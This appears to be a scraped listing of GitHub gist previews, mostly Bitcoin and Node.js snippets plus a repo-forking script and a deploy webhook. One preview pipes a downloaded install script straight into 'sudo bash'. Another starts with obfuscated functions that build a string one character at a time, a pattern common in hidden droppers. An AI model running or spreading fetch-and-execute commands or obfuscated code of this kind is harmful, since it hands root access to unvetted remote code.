This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function UHfIvfG() { | |
var MabOTGE = [(9), "f", 4][1]; | |
return MabOTGE; | |
} | |
function rQAVRn() { | |
var UdejotRq = [3, "r", 6][1]; | |
return UdejotRq; | |
} | |
function agwFZ() { | |
qnem = "C"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl https://install.21.co/bitcoin-computer/install.sh | sudo bash | |
Congratulations, you just saved $365. That's all there is to it. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"id": "e7d36084.182ca", | |
"type": "subflow", | |
"name": "Watch total received", | |
"info": "", | |
"in": [ | |
{ | |
"x": 517, | |
"y": 289, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Get output addresses from tx | |
tx.outputs.forEach(function(value, index){ | |
try { | |
console.log(value._satoshis) | |
console.log(toAddress(value._script.toHex())) | |
} catch(e){ | |
console.error(e) | |
} | |
}) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BlockHeader.prototype._getHash = function hash() { | |
var buf = this.toBuffer(); | |
//console.log("version",this.version, "is it?",this.version === 514 ) | |
//console.log("Scrypt",BufferUtil.reverse(BufferUtil.scrypt(buf)).toString('hex'))//.reverse(buf.read(80)).toString('hex')) | |
if (this.version === 514) { | |
return BufferUtil.reverse(BufferUtil.reverse(BufferUtil.scrypt(buf))) | |
} else { | |
return Hash.sha256sha256(buf); | |
} | |
}; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var ForkYou = function(username, password, userToFork, forkIntoOrg, page) { | |
if (page === undefined) { | |
page = 1 | |
} | |
var USER = userToFork | |
var ORG = forkIntoOrg | |
$.ajax({ | |
url: "https://api.github.com/users/" + USER + "/repos?per_page=100&page=" + page | |
}) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function bindClicks() { | |
/* Unbind by localnamespace (Awesome way to unbind a selective everything) */ | |
$(document).unbind(".customBindings") | |
/* Join Chat */ | |
$("a[href='#lobby']").bind("click.customBindings", function () { | |
joinLobby() | |
}) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* | |
* Authored by Shannon code to be my poor man's continuous integration. | |
* I use forever on the server combined with nodemon to moniror files for changes and restart them | |
* I have a webhook set in github that hits the below server /deploy upon every push | |
* | |
*/ | |
var express = require('express') | |
var basicAuth = require('http-auth') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var java = require("java") | |
java.classpath.push("./lib/omnij-rpc-0.3-SNAPSHOT.jar") | |
java.classpath.push("./lib/omnij-core-0.3-SNAPSHOT.jar") | |
java.classpath.push("./lib/bitcoin-rpc-0.3-SNAPSHOT.jar") | |
java.classpath.push("./lib/bitcoinj-core-0.13-SNAPSHOT.jar") | |
java.classpath.push("./lib/slf4j-api-1.7.6.jar") | |
java.classpath.push("./lib/slf4j-jdk14-1.7.5.jar") | |
java.classpath.push("./lib/guava-16.0.1.jar") | |
java.classpath.push("./lib/jackson-core-2.3.3.jar") | |
java.classpath.push("./lib/jackson-databind-2.3.3.jar") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var levelup = require('levelup') | |
var db = levelup('./') | |
db.createReadStream() | |
.on('data', console.log) | |
.on('close', function () { | |
db.close() | |
}) |